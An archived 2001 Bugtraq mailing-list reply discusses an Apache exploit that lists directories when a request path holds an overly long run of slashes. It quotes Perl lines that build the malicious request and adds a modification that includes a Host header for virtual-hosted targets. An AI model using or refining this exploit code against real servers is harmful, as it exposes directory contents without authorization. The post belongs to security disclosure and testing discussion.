mailing list archives
Re: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit
From: Stephen Cope <mail-d-20010615 () kimihia org nz>
Date: Fri, 15 Jun 2001 14:48:44 +1200
In my testing you need to take the Host header into account.
: $url = "GET ";
: $buffer = "/" x $low . " HTTP/1.0\r\n";
: $end = "\r\n\r\n";
The server I tested against uses mod_rewrite to do virtual hosting, and it
arrived at a different magic number with the host header, and against
without the header.
I made the following change to the above code:
$buffer = "/" x $low . " HTTP/1.0\r\nHost: ". $host ."\r\n";
Should be fairly easy to understand.
Stephen Cope <http://sdc.org.nz/>
Sign the petition and Stop the Pop: http://lifefm.org.nz/petition/